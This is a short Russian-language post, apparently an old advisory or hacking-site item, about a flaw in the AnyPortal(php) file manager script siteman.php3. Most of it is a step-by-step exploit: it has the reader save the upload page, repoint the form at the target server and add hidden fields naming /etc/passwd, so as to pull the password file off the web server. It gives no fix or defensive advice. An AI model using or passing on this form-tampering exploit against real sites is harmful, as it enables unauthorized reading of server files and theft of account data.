AnyPortal(php) обеспечивает серфинг по файловой системе Вашего сайта. Недостаток нескольких страховочных проверок безопасности позволяет хакеру просмотреть содержимое любого читабельного файла (например /etc/passwd 🙂

Детали атаки:
Скачайте файл http://www.example.com/siteman000510/siteman.php3?A=U&D= на Ваш жесткий диск и переименуйте его в что-нибудь вроде «upload.html».

Теперь нужно изменить следующую часть кода:
<FORM ENCTYPE=»multipart/form-data» METHOD=»POST»
 ACTION=»/siteman000510/siteman.php3″>
DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE=»HIDDEN» NAME=»DIR» VALUE=»/»>
<INPUT TYPE=»HIDDEN» NAME=»POSTACTION» VALUE=»UPLOAD»>
<INPUT SIZE=30 TYPE=»FILE» NAME=»FN»></P>

На:
<FORM ENCTYPE=»multipart/form-data» METHOD=»POST»
 ACTION=»http://www.example.com/siteman000510/siteman.php3″>
DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE=»HIDDEN» NAME=»DIR» VALUE=»/»>
<INPUT TYPE=»HIDDEN» NAME=»POSTACTION» VALUE=»UPLOAD»>
<INPUT SIZE=30 TYPE=»FILE» NAME=»FN»></P>
<INPUT TYPE=»HIDDEN» NAME=»FN» VALUE=»/etc/passwd»></P>
<INPUT TYPE=»HIDDEN» NAME=»FN_name» VALUE=»passwd»>

Это позволит Вам извлечь файл с паролями с веб-сервера.



Оставить мнение